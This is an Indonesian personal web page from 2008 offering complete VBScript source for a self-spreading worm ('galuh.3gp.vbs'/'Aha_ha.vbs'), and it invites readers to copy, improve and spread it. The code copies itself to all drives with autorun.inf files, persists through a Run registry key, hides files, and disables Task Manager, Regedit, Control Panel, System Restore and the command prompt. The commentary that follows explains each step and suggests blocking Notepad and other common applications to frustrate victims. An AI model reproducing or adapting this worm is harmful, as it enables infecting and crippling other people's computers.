| Link | ||
 |
 |
 |
| www.Ariyanto.multiply.com | www.Ariyanto.page.tl | www.Friendster.comAriyantoFriends |
Aha_ha.Vbs
Galuh.3gp.Vbs
Nah... kalo yang pingin coba-coba VIrus, lebih baek virus Ni aje.... Virus ni lebih aman dan nyaman, kembangin dan sebarin ya! Tapi....saya yakin jika virus ini jatuh ke tangan orang kreatif plus tak bertanggung jawab, wah wah wah... virus ini bisa sangat berbahaya! Namun itu urusan belakangan, pelajarin aja dulu souskodenya lalu kembangin, caranya kopi kode dari mulai huruf 'O' sampai huruf 'E' lalu paste di notpet (notepad maksudnya), lalu save dengan nama "Apa_aja.vbs". Penjelasannya ada di bawah. (Klik di sini untuk penjelasan)
------------------------------
-------------
on error resume next
dim urang,abdi,aing,kuring,anak,mf,isi,tf,galuh,nt,check,sd
'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Aha_ha.vbs"
set anak = createobject("Scripting.FileSystemObject")
set mf = anak.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
urang = urang & text.readline
urang = urang & vbcrlf
loop
do
'buat file induk
Set aing = anak.getspecialfolder(0)
Set abdi = anak.getspecialfolder(1)
set tf = anak.getfile(abdi & "recycle.vbs")
tf.attributes = 32
set tf = anak.createtextfile(abdi & "recycle.vbs",2,true)
tf.write urang
tf.close
set tf = anak.getfile(abdi & "recycle.vbs")
tf.attributes = 39
'sebar ke removable disc ditambahkan dengan Autorun.inf
for each kuring in anak.drives
If (kuring.drivetype = 1 or kuring.drivetype = 2) and kuring.path <> "A:" then
set tf=anak.getfile(kuring.path &"galuh.sys.vbs")
tf.attributes =32
set tf=anak.createtextfile(kuring.path &"Aha_ha.vbs",2,true)
tf.write urang
tf.close
set tf=anak.getfile(kuring.path &"Aha_ha.vbs")
tf.attributes = 39
set tf =anak.getfile(kuring.path &"autorun.inf")
tf.attributes = 32
set tf=anak.createtextfile(kuring.path &"autorun.inf",2,true)
tf.write isi
tf.close
set tf = anak.getfile(kuring.path &"autorun.inf")
tf.attributes=39
end if
next
'Manipulasi Registry
set galuh = createobject("WScript.Shell")
'Ubah IE Title
galuh.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","::Pesan anda tulis di sini!::"
'File Hidden tak terlihat
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden",1, "REG_DWORD"
'Blokir Find, FolderOptions, Run, Regedit, Task Manager, System Restore, perubahan Wallpaper, Hotkey, Control Panel, dan Log Off
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu", "1", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesActiveDesktopNoChangingWallpaper", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys", "1", "REG_DWORD"
galuh.RegWrite "HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTSystemRestoreDisableSR", "1", "REG_DWORD"
galuh.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff", "1", "REG_DWORD"
galuh.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoControlPanel", "1", "REG_DWORD"
'Ubah tulisan pertama pada text box menu RUN
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRUa", "Pesan Anda di Sini"
galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRUMRUList", "a"
'Buat pesan saat Windows Startup
galuh.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption", "Selamat menikmati"
galuh.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText", "Saya numpang nginep di komputer ini ya! Tenang aja it's Ok, saya gak bakalan ngrusak komputer kamu kok!"
galuh.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunAgeia", abdi & "recycle.vbs"
galuh.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.google.com"
galuh.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger","1"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run aing & "explorer.exe /e,/select, " & Wscript.ScriptFullname
---------------------
Nama virusnya adalah 'galuh.3gp.vbs' a.k.a 'Aha_ha.vbs'. Virus ini tidak berbahaya, namun namanya juga virus pastilah menjengkelkan. Soalnya virus ini sulit sekali untuk dihapus secara manual, tapi tenang aja, banyak antivirus yang sudah berkenalan dengan virus ini. Jadi jangan takut untuk berkreasi dengan virus ini di komputer Sampeyan (baca: Anda).
Pertama-tama, virus ini membuat file autorun.inf pada setiap direktori. Apabila file autorun ini dibuka pake notpet, maka akan muncul:
-----------
[Autorun]
Shellexecute=WScript.exe galuh.3gp.vbs
atau
Shellexecute=WScript.exe Aha_ha.vbs
-----------
Autorun ini fungsinya untuk mengeksekusi virus tanpa harus mengeksekusi langsung file virus tsb. Cukup dengan klik ganda pada drive yang terinfeksi atau menekan enter pada drive tsb. maka virus ini tereksekusi dengan sendirinya. Itu artinya, Anda tidak akan sadar bahwa Anda telah mengaktifkan BOM pada komputer Anda sendiri.
Pembuatan File Autorun.inf ini ada pada kode:
--------------
'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Aha_ha.vbs"
set anak = createobject("Scripting.FileSystemObject")
set mf = anak.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
urang = urang & text.readline
urang = urang & vbcrlf
loop
do
------------
Metode ini telah popular di dunia Virus. Mungkin karena Virus Maker berfikir bahwa dengan cara ini, virus mereka akan dengan mudah menyebar tanpa disadari oleh empunya komputer.
Teknologi Autorun pada virus yang lain bahkan ada yang lebih maju. Kita tilik aja Autorun milik Virus ".vbs". Jika dibuka filenya maka akan terlihat:
----
[Autorun]
Shellexecute=WScript.exe .vbs
shellopencommand=WScript.exe .vbs
shellexplorecommand=WScript.exe .vbs
action=Open folder to view files
----
- Shellexecute=wscript.exe .vbs berfungsi untuk menentukan aksi saat drive diklik ganda atau enter. Ketika drive ditekan enter atau diklik ganda, maka komputer akan membuka aplikasi 'WScript.exe' (Aplikasi pembuka skrip milik Microsoft) dengan file yang akan dibuka yakni ".vbs".
- Shellopencommand=.vbs atau
Shellexplorecommand=.vbs berfungsi untuk
menentukan aksi saat drive diklik kanan kemudian Open atau Explore. Jadi ketika
drive diklik kana kemudian Explore/Open, maka yang akan terbuka adalah file ".vbs"
alias file Virus.
* Kode di atas mempunyai formula spt. di bawah ini, dan kita bisa manipulasi sesuai dengan yang kita inginkan.
Shell[Kata-kata]command=[aplikasi].exe [spasi] [File_yang_ingin_dibuka.file]
contoh:
ShellBuka dong!command=mplayer2.exe Laguku.mp3
- Action=Open folder to view files
berfungsi untuk
menampilkan kotak dialog 'Action' dengan default 'Open folder to view files'
pada saat Drive (flashdisk dll) dicolokkan ke dalam komputer, maka akan muncul
kotak dialog seperti pd gambar dibawah, jika Aksi ini
dipilih, atau dengan kata lain ditekan tombol OK, maka akan dijalankan aksi 'Shellexecute=namavirus'
dengan kata lain jika ditekan ok maka sama saja dengan membuka file virus.
* Kode di atas memiliki formula:
Action=[kata-kata]
Kita bisa ganti kata-kata tersebut dengan kata yang kita inginkan. Contoh:
Action=Pilih saya dong!
Nah sekarang tugas Anda untuk mengembangkan file Autorun pada virus ini seperti yang dijelaskan di atas.
Tahap selanjutnya dari virus ini adalah pembuatan file induk virus. FIle induk virus terletak pada direktori:
C:WindowsRecycle.vbs atau di mana Windows terinstal
Dengan kombinasi dari manipulasi registri Windows, maka dengan file induk ini virus akan tetap hidup selama komputer itu hidup.
Lalu Virus tsb. menyebarluaskan dirinya sendiri pada setiap drive ditambah dengan file Autorun.inf yang sudah dipersiapkan tadi. Dengan kombinasi tersebut, maka virus ini sudah punya cukup modal untuk menyebar dengan mudah ke seantero jagad.
Karena virus ini berbentuk VBScript, maka akan dengan mudah untuk diedit oleh orang ataupun dideteksi oleh antivirus, tapi jangan kuatir, virus ini punya trik jitu untuk menangkalnya. Lihat kode di bawah ini!
galuh.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger","1"
Kode di atas berfungsi untuk menuliskan kunci pada registri Windows yang berfungsi untuk memblokir aplikasi yang dirasa membahayakan kelangsungan hidup virus ini. Pada contoh, saya tulis '....cmd.exe...' itu adalah kode untuk memblokir program CommandPromt. Maka dari itu, silakan KEMBANGKAN kode tersebut untuk memblokir aplikasi yang lain yang dirasa membahayakan, seperti 'Notepad'. (Loh Kok notpet berbahaya?). Memang, notpet tidak berbahaya, tapi karena virus ini berekstensi VBS, maka aplikasi untuk membuka dan mengedit atau mengacak-acak virus ini adalah notpet itu. Jadi sangat penting untuk memblokir applikasi notpet agar virus ini tidak diutak atik orang lain.
Tips lain. Jika pingin lebih jail, coba blokir semua aplikasi yang paling sering digunakan oleh USEr, dengan demikian, maka virus ini cukup untuk membuat USEr menjadi pusing tujuh keliling karena filenya tidak bisa dibuka dan aplikasinya telah diblokir oleh Anda.
Untuk memberi kenang-kenangan, virus ini juga menuliskan pesan pada saat kom. start up. Juga pada menu RUN dan pada judul di InternetExplorer. Lumayan kan buat ngenalin diri kita, atau sekadar promosi, mumpung gratiss.........
Udah deh, kalo pingin lebi jelas, Kopi dan paste or donlot aja kodenya lalu eksekusi deh di komputer kamu, biar kamu tahu akibat yang ditimbulkan dari virus ini.
Yours Truly
Ariyanto
Author information goes here.
riyanto.mail@gmail.com
Copyright Ariyanto © 2008 [Aha_ha Communitee]. All rights reserved.
Revised: 07/25/08.
